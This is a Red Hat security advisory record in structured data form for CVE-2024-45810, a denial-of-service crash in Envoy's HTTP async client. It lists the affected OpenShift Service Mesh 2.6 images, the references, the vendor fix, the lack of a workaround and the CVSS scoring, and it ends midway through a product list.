{ cve: "CVE-2024-45810", cwe: { id: "CWE-119", name: "Improper Restriction of Operations within the Bounds of a Memory Buffer", }, discovery_date: "2024-09-20T00:40:31.483825+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2313687", }, ], notes: [ { category: "description", text: "A flaw was found in Envoy. Envoy will crash when the http async client is handling `sendLocalReply` under some circumstances, such as websocket upgrade and requests mirroring. The http async client will crash during the `sendLocalReply()` in http async client if the http async client is duplicating the status code or if the destruction of the router is called at the destructor of the async stream while the stream is deferred or deleted. This issue occurs when the stream decoder is destroyed but it's reference is called in `router.onDestroy()`, causing a segment fault. This will impact ext_authz if the `upgrade` and `connection` header are allowed.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Envoy crashes for `LocalReply` in HTTP async client", title: "Vulnerability summary", }, { category: "other", text: "The vulnerability in Envoy related to the HTTP async client crashing during `sendLocalReply()` is classified as moderate severity rather than important due to the crash is contingent on particular scenarios, such as websocket upgrades and request mirroring, which may not be common in all deployments. Additionally, while the segmentation fault can disrupt service, it does not compromise data integrity or expose sensitive information.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-45810", }, { category: "external", summary: "RHBZ#2313687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313687", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-45810", url: "https://www.cve.org/CVERecord?id=CVE-2024-45810", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-45810", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-45810", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q", }, ], release_date: "2024-09-20T00:15:03.153000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", 